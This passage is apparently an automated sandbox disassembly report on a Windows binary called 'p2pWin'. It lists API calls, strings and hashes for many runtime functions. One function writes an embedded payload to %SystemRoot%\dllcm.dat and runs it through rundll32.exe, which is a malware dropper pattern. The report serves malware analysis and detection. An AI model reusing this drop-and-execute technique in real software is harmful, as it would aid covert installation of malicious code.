3340 3485e 3339->3340 3342 34868 3340->3342 3346 34891 3340->3346 3341->3332 3342->3338 3344 3487c LCMapStringW 3342->3344 3343->3332 3343->3335 3344->3338 3345 348e0 LCMapStringW 3347 348f6 WideCharToMultiByte 3345->3347 3348 34918 3345->3348 3349 348ac __alloca_probe_16 3346->3349 3350 34aaa _malloc 62 API calls 3346->3350 3347->3348 3351 34671 __freea 62 API calls 3348->3351 3349->3338 3349->3345 3350->3349 3351->3338 3353->3291 3355 33d14 3354->3355 3356 33d1b 3354->3356 3355->3356 3361 33d39 3355->3361 3357 32e3f _malloc 62 API calls 3356->3357 3358 33d20 3357->3358 3359 32db6 _strcpy_s 10 API calls 3358->3359 3360 33d2a 3359->3360 3360->2595 3361->3360 3362 32e3f _malloc 62 API calls 3361->3362 3362->3358 3364 32f92 EncodePointer 3363->3364 3364->3364 3365 32fac 3364->3365 3365->2612 3369 32f39 3366->3369 3368 32f82 3368->2614 3370 32f45 __mtinitlocknum 3369->3370 3377 3142e 3370->3377 3376 32f66 __mtinitlocknum 3376->3368 3378 329d6 __lock 62 API calls 3377->3378 3379 31435 3378->3379 3380 32e52 DecodePointer DecodePointer 3379->3380 3381 32f01 3380->3381 3382 32e80 3380->3382 3391 32f6f 3381->3391 3382->3381 3394 3471a 3382->3394 3384 32ee4 EncodePointer EncodePointer 3384->3381 3385 32e92 3385->3384 3386 32eb6 3385->3386 3401 33df6 3385->3401 3386->3381 3388 33df6 __realloc_crt 66 API calls 3386->3388 3389 32ed2 EncodePointer 3386->3389 3390 32ecc 3388->3390 3389->3384 3390->3381 3390->3389 3424 31437 3391->3424 3395 34725 3394->3395 3396 3473a HeapSize 3394->3396 3397 32e3f _malloc 62 API calls 3395->3397 3396->3385 3398 3472a 3397->3398 3399 32db6 _strcpy_s 10 API calls 3398->3399 3400 34735 3399->3400 3400->3385 3403 33dff 3401->3403 3404 33e3e 3403->3404 3405 33e1f Sleep 3403->3405 3406 34bc0 3403->3406 3404->3386 3405->3403 3407 34bd6 3406->3407 3408 34bcb 3406->3408 3410 34bde 3407->3410 3417 34beb _malloc 3407->3417 3409 34aaa _malloc 62 API calls 3408->3409 3411 34bd3 3409->3411 3412 33ccc _free 62 API calls 3410->3412 3411->3403 3423 34be6 _free 
3412->3423 3413 34c23 _malloc 3415 32e3f _malloc 62 API calls 3413->3415 3414 34bf3 HeapReAlloc 3414->3417 3414->3423 3415->3423 3416 34c53 3418 32e3f _malloc 62 API calls 3416->3418 3417->3413 3417->3414 3417->3416 3420 34c3b 3417->3420 3419 34c58 GetLastError 3418->3419 3419->3423 3421 32e3f _malloc 62 API calls 3420->3421 3422 34c40 GetLastError 3421->3422 3422->3423 3423->3403 3427 328fd LeaveCriticalSection 3424->3427 3426 3143e 3426->3376 3427->3426 3429 31009 3428->3429 3430 3100d 8 API calls 3428->3430 3429->2623 3430->2623 3432 3153a __mtinitlocknum 3431->3432 3433 329d6 __lock 57 API calls 3432->3433 3434 31541 3433->3434 3436 3156c DecodePointer 3434->3436 3440 315eb 3434->3440 3438 31583 DecodePointer 3436->3438 3436->3440 3450 31596 3438->3450 3439 31668 __mtinitlocknum 3439->2628 3452 31659 3440->3452 3443 31650 3444 31416 _fast_error_exit 3 API calls 3443->3444 3445 31659 3444->3445 3446 31666 3445->3446 3459 328fd LeaveCriticalSection 3445->3459 3446->2628 3447 315ad DecodePointer 3458 320e6 EncodePointer 3447->3458 3450->3440 3450->3447 3451 315bc DecodePointer DecodePointer 3450->3451 3457 320e6 EncodePointer 3450->3457 3451->3450 3453 31639 3452->3453 3454 3165f 3452->3454 3453->3439 3456 328fd LeaveCriticalSection 3453->3456 3460 328fd LeaveCriticalSection 3454->3460 3456->3443 3457->3450 3458->3450 3459->3446 3460->3453 3462 3152e _doexit 62 API calls 3461->3462 3463 31695 3462->3463

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 00031000: GetProcessHeap.KERNEL32(00000008,00000104), ref: 0003101D
                                                  • Part of subcall function 00031000: HeapAlloc.KERNEL32(00000000), ref: 00031026
                                                  • Part of subcall function 00031000: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000104), ref: 00031034
                                                  • Part of subcall function 00031000: GetProcessHeap.KERNEL32(00000008,00000104), ref: 00031041
                                                  • Part of subcall function 00031000: HeapAlloc.KERNEL32(00000000), ref: 00031044
                                                  • Part of subcall function 00031000: GetFullPathNameA.KERNEL32(00000000,00000104,00000000,00000000), ref: 00031051
                                                  • Part of subcall function 00031000: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0003105A
                                                  • Part of subcall function 00031000: HeapFree.KERNEL32(00000000), ref: 0003105D
                                                • CreateFileA.KERNELBASE(00000000,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 000310A4
                                                • WriteFile.KERNELBASE(00000000,00037830,00058778,?,00000000), ref: 000310BD
                                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 000310C4
                                                • ShellExecuteA.SHELL32(00000000,00000000,rundll32.exe,00000000,00000000,0000000A), ref: 000310D8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1631014535.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                • Associated: 00000000.00000002.1630961626.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1631035398.0000000000036000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1631072955.0000000000091000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1631086483.0000000000093000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_30000_p2pWin.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$Process$AllocFile$ChangeCloseCreateEnvironmentExecuteExpandFindFreeFullNameNotificationPathShellStringsWrite
                                                • String ID: %SystemRoot%\dllcm.dat$%SystemRoot%\dllcm.dat #1$rundll32.exe
                                                • API String ID: 2615097910-798080983
                                                • Opcode ID: aa3b410081f3fa46424a55e8da36aad3c861bf5234598dc4a406de0b9c447c92
                                                • Instruction ID: d3cff6220ead535f89410b65e78c3ccdffd9c345ca9ba5859562565d6a501d54
                                                • Opcode Fuzzy Hash: aa3b410081f3fa46424a55e8da36aad3c861bf5234598dc4a406de0b9c447c92
                                                • Instruction Fuzzy Hash: 3DF05E367C432476F23623A4AC0BF9B365C9B4AF52F204121FB45FE0C299E5690183F9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 5 31416-31427 call 313eb ExitProcess
                                                APIs
                                                • ___crtCorExitProcess.LIBCMT ref: 0003141E
                                                  • Part of subcall function 000313EB: GetModuleHandleW.KERNEL32(mscoree.dll,?,00031423,?,?,00034AD9,000000FF,0000001E,00000001,00000000,00000000,?,00033D76,?,00000001,?), ref: 000313F5
                                                  • Part of subcall function 000313EB: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00031405
                                                • ExitProcess.KERNEL32 ref: 00031427
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1631014535.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                • Associated: 00000000.00000002.1630961626.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1631035398.0000000000036000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1631072955.0000000000091000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1631086483.0000000000093000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_30000_p2pWin.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                • String ID:
                                                • API String ID: 2427264223-0
                                                • Opcode ID: 768de72cfd659ca3d3f86a6b32d43c533b43e0c705e84228b245ebed7cac69c3
                                                • Instruction ID: 05e78ea67682f543936c837c20d1fbe6baa957b9afcc784e075a5381592e11f1
                                                • Opcode Fuzzy Hash: 768de72cfd659ca3d3f86a6b32d43c533b43e0c705e84228b245ebed7cac69c3
                                                • Instruction Fuzzy Hash: 44B09B310041087BDB072F51DC0A88D3F2DEB41751B104010F50505031DF729D529990
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 8 34b3e-34b48 9 34b65-34b6e 8->9 10 34b4a-34b54 8->10 12 34b71-34b76 9->12 13 34b70 9->13 10->9 11 34b56-34b64 call 32e3f 10->11 15 34b8b-34b92 12->15 16 34b78-34b89 RtlAllocateHeap 12->16 13->12 19 34bb0-34bb5 15->19 20 34b94-34b9d call 32dd5 15->20 16->15 18 34bbd-34bbf 16->18 19->18 21 34bb7 19->21 20->12 24 34b9f-34ba4 20->24 21->18 25 34ba6 24->25 26 34bac-34bae 24->26 25->26 26->18
                                                APIs
                                                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00033DC0,?,?,00000000,00000000,00000000,?,00032248,00000001,00000214,?,00031737), ref: 00034B81
                                                  • Part of subcall function 00032E3F: __getptd_noexit.LIBCMT ref: 00032E3F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1631014535.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                • Associated: 00000000.00000002.1630961626.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1631035398.0000000000036000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1631072955.0000000000091000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1631086483.0000000000093000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_30000_p2pWin.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap__getptd_noexit
                                                • String ID:
                                                • API String ID: 328603210-0
                                                • Opcode ID: 952ff98fc0cadc77007566ef133357633b00a21b581a23617f955a5f393ecbd3
                                                • Instruction ID: 91f080b8139c7a8211ba70f2005a695ea46cf937a36ef891e033389d40e67a08
                                                • Opcode Fuzzy Hash: 952ff98fc0cadc77007566ef133357633b00a21b581a23617f955a5f393ecbd3
                                                • Instruction Fuzzy Hash: B701F2312012159BEB6B9F25DC58F6BB7DCEFC07A0F014629E815CF290DB38EC008690
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph: rendered graph not recoverable; basic blocks 3166e-31683, with a call to 3152e.
                                                APIs
                                                • _doexit.LIBCMT ref: 0003167A
                                                  • Part of subcall function 0003152E: __lock.LIBCMT ref: 0003153C
                                                  • Part of subcall function 0003152E: DecodePointer.KERNEL32(000900E0,00000020,00031695,?,00000001,00000000,?,000316D5,000000FF,?,000329FD,00000011,?,?,000321B3,0000000D), ref: 00031578
                                                  • Part of subcall function 0003152E: DecodePointer.KERNEL32(?,000316D5,000000FF,?,000329FD,00000011,?,?,000321B3,0000000D,?,00031737,00000003), ref: 00031589
                                                  • Part of subcall function 0003152E: DecodePointer.KERNEL32(-00000004,?,000316D5,000000FF,?,000329FD,00000011,?,?,000321B3,0000000D,?,00031737,00000003), ref: 000315AF
                                                  • Part of subcall function 0003152E: DecodePointer.KERNEL32(?,000316D5,000000FF,?,000329FD,00000011,?,?,000321B3,0000000D,?,00031737,00000003), ref: 000315C2
                                                  • Part of subcall function 0003152E: DecodePointer.KERNEL32(?,000316D5,000000FF,?,000329FD,00000011,?,?,000321B3,0000000D,?,00031737,00000003), ref: 000315CC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1631014535.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                • Associated: 00000000.00000002.1630961626.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1631035398.0000000000036000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1631072955.0000000000091000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1631086483.0000000000093000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_30000_p2pWin.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DecodePointer$__lock_doexit
                                                • String ID:
                                                • API String ID: 3343572566-0
                                                • Opcode ID: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                                                • Instruction ID: 1a60604d6656ddd58536fa63dbef2e81f9f17d852e610918cbb64c7af1340e2d
                                                • Opcode Fuzzy Hash: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                                                • Instruction Fuzzy Hash: 10B0923268020873DA212642EC03F863A0D87C4B60E240020BA0D191A2A9A2A9628089
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • GetProcessHeap.KERNEL32(00000008,00000104), ref: 0003101D
                                                • HeapAlloc.KERNEL32(00000000), ref: 00031026
                                                • ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000104), ref: 00031034
                                                • GetProcessHeap.KERNEL32(00000008,00000104), ref: 00031041
                                                • HeapAlloc.KERNEL32(00000000), ref: 00031044
                                                • GetFullPathNameA.KERNEL32(00000000,00000104,00000000,00000000), ref: 00031051
                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0003105A
                                                • HeapFree.KERNEL32(00000000), ref: 0003105D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1631014535.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                • Associated: 00000000.00000002.1630961626.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1631035398.0000000000036000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1631072955.0000000000091000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1631086483.0000000000093000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_30000_p2pWin.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$Process$Alloc$EnvironmentExpandFreeFullNamePathStrings
                                                • String ID:
                                                • API String ID: 3786712135-0
                                                • Opcode ID: 1ecdee25d2b0e590f70487ed8149a3f6a0df7211c4bf1742bfacce9ed6c57691
                                                • Instruction ID: 4eb43385765eeaa30e39d49eefb011545b2446dd85c47a5f364b35da87154050
                                                • Opcode Fuzzy Hash: 1ecdee25d2b0e590f70487ed8149a3f6a0df7211c4bf1742bfacce9ed6c57691
                                                • Instruction Fuzzy Hash: B7F030B62412087BF611A7A9AC8AF9B7A9CEB89769F008011F34CC6190C9F5884087B0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • IsDebuggerPresent.KERNEL32 ref: 00031350
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00031365
                                                • UnhandledExceptionFilter.KERNEL32(0003614C), ref: 00031370
                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 0003138C
                                                • TerminateProcess.KERNEL32(00000000), ref: 00031393
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1631014535.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                • Associated: 00000000.00000002.1630961626.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1631035398.0000000000036000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1631072955.0000000000091000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1631086483.0000000000093000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_30000_p2pWin.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                • String ID:
                                                • API String ID: 2579439406-0
                                                • Opcode ID: 37fa4b28edff6a76ae7c937073079bd5386698b4329d645ee3526e0bd84d3bed
                                                • Instruction ID: 9a854523d115cc9de3b8260b0ec97ea15ab1ee432f107bc34425c9fe086e3868
                                                • Opcode Fuzzy Hash: 37fa4b28edff6a76ae7c937073079bd5386698b4329d645ee3526e0bd84d3bed
                                                • Instruction Fuzzy Hash: 0C2123B8681206EFE706DF68E9856D43BB8BB08351F10841BE51887371EBB999818F08
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph: rendered graph not recoverable; basic blocks 323df-32559, with calls to GetModuleHandleW, 3212c, GetProcAddress (4 times), TlsAlloc, TlsSetValue, 31440, EncodePointer (4 times), 3285c, DecodePointer, 33daa, 32169 and GetCurrentThreadId.
                                                APIs
                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,000311A8), ref: 000323E7
                                                • __mtterm.LIBCMT ref: 000323F3
                                                  • Part of subcall function 0003212C: DecodePointer.KERNEL32(00000004,00032555,?,000311A8), ref: 0003213D
                                                  • Part of subcall function 0003212C: TlsFree.KERNEL32(0000000C,00032555,?,000311A8), ref: 00032157
                                                  • Part of subcall function 0003212C: DeleteCriticalSection.KERNEL32(00000000,00000000,76EF5810,?,00032555,?,000311A8), ref: 000328C3
                                                  • Part of subcall function 0003212C: _free.LIBCMT ref: 000328C6
                                                  • Part of subcall function 0003212C: DeleteCriticalSection.KERNEL32(0000000C,76EF5810,?,00032555,?,000311A8), ref: 000328ED
                                                • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00032409
                                                • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00032416
                                                • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00032423
                                                • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00032430
                                                • TlsAlloc.KERNEL32(?,000311A8), ref: 00032480
                                                • TlsSetValue.KERNEL32(00000000,?,000311A8), ref: 0003249B
                                                • __init_pointers.LIBCMT ref: 000324A5
                                                • EncodePointer.KERNEL32(?,000311A8), ref: 000324B6
                                                • EncodePointer.KERNEL32(?,000311A8), ref: 000324C3
                                                • EncodePointer.KERNEL32(?,000311A8), ref: 000324D0
                                                • EncodePointer.KERNEL32(?,000311A8), ref: 000324DD
                                                • DecodePointer.KERNEL32(000322B0,?,000311A8), ref: 000324FE
                                                • __calloc_crt.LIBCMT ref: 00032513
                                                • DecodePointer.KERNEL32(00000000,?,000311A8), ref: 0003252D
                                                • GetCurrentThreadId.KERNEL32 ref: 0003253F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1631014535.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                • Associated: 00000000.00000002.1630961626.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1631035398.0000000000036000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1631072955.0000000000091000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1631086483.0000000000093000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_30000_p2pWin.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL$PNv
                                                • API String ID: 3698121176-2259100434
                                                • Opcode ID: da18032fc11fee9e19ea1fa65cbe42afc434084aea8a5bfb5ce94b0b4be0c1b0
                                                • Instruction ID: 3e13074b941b164ae6191f9522ac2a8d3afe372a5b8898d18796e98917fd4c00
                                                • Opcode Fuzzy Hash: da18032fc11fee9e19ea1fa65cbe42afc434084aea8a5bfb5ce94b0b4be0c1b0
                                                • Instruction Fuzzy Hash: 3B316D31900B10BFE757AB75AC2965A3BE8FB46360B12851BE540D32B0EB7E9445CF60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00090100,00000008,00032271,00000000,00000000,?,00031737,00000003), ref: 0003217A
                                                • __lock.LIBCMT ref: 000321AE
                                                  • Part of subcall function 000329D6: __mtinitlocknum.LIBCMT ref: 000329EC
                                                  • Part of subcall function 000329D6: __amsg_exit.LIBCMT ref: 000329F8
                                                  • Part of subcall function 000329D6: EnterCriticalSection.KERNEL32(?,?,?,000321B3,0000000D,?,00031737,00000003), ref: 00032A00
                                                • InterlockedIncrement.KERNEL32(00091320), ref: 000321BB
                                                • __lock.LIBCMT ref: 000321CF
                                                • ___addlocaleref.LIBCMT ref: 000321ED
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1631014535.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                • Associated: 00000000.00000002.1630961626.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1631035398.0000000000036000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1631072955.0000000000091000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1631086483.0000000000093000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_30000_p2pWin.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                • String ID: KERNEL32.DLL
                                                • API String ID: 637971194-2576044830
                                                • Opcode ID: da002d6f8f3c6a489cda9c32feee5d023a3df4d70a476f1eb2dbbedeb8e72840
                                                • Instruction ID: 3f5a80a8104864e7d2ccab9a7c335f6c5eaad072ea7281d7b8a53b00bef92b5c
                                                • Opcode Fuzzy Hash: da002d6f8f3c6a489cda9c32feee5d023a3df4d70a476f1eb2dbbedeb8e72840
                                                • Instruction Fuzzy Hash: 88018471500B01EFE722AF65D80678AFBF4BF00324F10890EE5D5567A2CBB4A684CF21
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • __getptd.LIBCMT ref: 00033817
                                                  • Part of subcall function 00032296: __getptd_noexit.LIBCMT ref: 00032299
                                                  • Part of subcall function 00032296: __amsg_exit.LIBCMT ref: 000322A6
                                                • __amsg_exit.LIBCMT ref: 00033837
                                                • __lock.LIBCMT ref: 00033847
                                                • InterlockedDecrement.KERNEL32(?), ref: 00033864
                                                • _free.LIBCMT ref: 00033877
                                                • InterlockedIncrement.KERNEL32(00FE1660), ref: 0003388F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1631014535.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                • Associated: 00000000.00000002.1630961626.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1631035398.0000000000036000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1631072955.0000000000091000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1631086483.0000000000093000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_30000_p2pWin.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                • String ID:
                                                • API String ID: 3470314060-0
                                                • Opcode ID: b748bd92821823ee2c8fd21702654b616c00cbe2007cc1a95022bbdb860fac41
                                                • Instruction ID: 1699314a838e0fbe1c6da7d1b51b55209f8a0f3d33b845bdbd11d30f18ffd859
                                                • Opcode Fuzzy Hash: b748bd92821823ee2c8fd21702654b616c00cbe2007cc1a95022bbdb860fac41
                                                • Instruction Fuzzy Hash: 9D01D632A01712ABDB63AFA49446BDDB3E9BF04B60F104006F400A7692CF389E41CBD1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • _malloc.LIBCMT ref: 00034BCE
                                                  • Part of subcall function 00034AAA: __FF_MSGBANNER.LIBCMT ref: 00034AC3
                                                  • Part of subcall function 00034AAA: __NMSG_WRITE.LIBCMT ref: 00034ACA
                                                  • Part of subcall function 00034AAA: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00033D76,?,00000001,?,?,00032961,00000018,00090170,0000000C,000329F1), ref: 00034AEF
                                                • _free.LIBCMT ref: 00034BE1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1631014535.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                • Associated: 00000000.00000002.1630961626.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1631035398.0000000000036000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1631072955.0000000000091000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1631086483.0000000000093000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_30000_p2pWin.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap_free_malloc
                                                • String ID:
                                                • API String ID: 1020059152-0
                                                • Opcode ID: b5adf2f4bdab92c21182bba0f6deeba2597a95aa579056da852a1c0aa71222fb
                                                • Instruction ID: 26710cf6c18a13613dd7f3dcb417077f011c6e1f03be8ffc863bc6db41f6202c
                                                • Opcode Fuzzy Hash: b5adf2f4bdab92c21182bba0f6deeba2597a95aa579056da852a1c0aa71222fb
                                                • Instruction Fuzzy Hash: D011E336406619ABCB737F74AC05B9E37DDAF803A1F209425F9499E152DF38E8818690
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • __getptd.LIBCMT ref: 00034110
                                                  • Part of subcall function 00032296: __getptd_noexit.LIBCMT ref: 00032299
                                                  • Part of subcall function 00032296: __amsg_exit.LIBCMT ref: 000322A6
                                                • __getptd.LIBCMT ref: 00034127
                                                • __amsg_exit.LIBCMT ref: 00034135
                                                • __lock.LIBCMT ref: 00034145
                                                • __updatetlocinfoEx_nolock.LIBCMT ref: 00034159
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1631014535.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                • Associated: 00000000.00000002.1630961626.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1631035398.0000000000036000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1631072955.0000000000091000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1631086483.0000000000093000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_30000_p2pWin.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                • String ID:
                                                • API String ID: 938513278-0
                                                • Opcode ID: 0c83fb4aac9c5af6129f8a847e8cafbde9112ddaa26596e3d444dfdaa18ff60e
                                                • Instruction ID: 7f50552f72cb4cb3963ed826214fc5a6cc63bfa4b3488bcd295859d09867f4d4
                                                • Opcode Fuzzy Hash: 0c83fb4aac9c5af6129f8a847e8cafbde9112ddaa26596e3d444dfdaa18ff60e
                                                • Instruction Fuzzy Hash: E3F09032A05B119BE763BBA498037DE33E8BF14721F50410AF400AB2C3DB7469809A5A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • TlsGetValue.KERNEL32(?,00032234,?,00031737,00000003), ref: 00032101
                                                • DecodePointer.KERNEL32(?,00031737,00000003), ref: 00032113
                                                • TlsSetValue.KERNEL32(00000000,?,00031737,00000003), ref: 00032122
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1631014535.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                • Associated: 00000000.00000002.1630961626.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1631035398.0000000000036000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1631072955.0000000000091000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1631086483.0000000000093000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_30000_p2pWin.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Value$DecodePointer
                                                • String ID: PNv
                                                • API String ID: 721062344-4070351811
                                                • Opcode ID: 8522c18bcf17021c52df5973738f8dd3308801213d4e7172d2c8ce2ca57ab6be
                                                • Instruction ID: 6f9c92fcbedaf11a24de3b43548a4c75dc917ab3ffbdf4da887801ffc6516ee5
                                                • Opcode Fuzzy Hash: 8522c18bcf17021c52df5973738f8dd3308801213d4e7172d2c8ce2ca57ab6be
                                                • Instruction Fuzzy Hash: A0D01731504021ABA7231B12BD098C63FAAEB853A23024022FA05D3230E63E4C488E90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DecodePointer.KERNEL32(?,00032DC2,00000000,00000000,00000000,00000000,00000000,000334F1,?,00031737,00000003), ref: 00032D94
                                                • __invoke_watson.LIBCMT ref: 00032DB0
                                                Strings
                                                Memory Dump Source
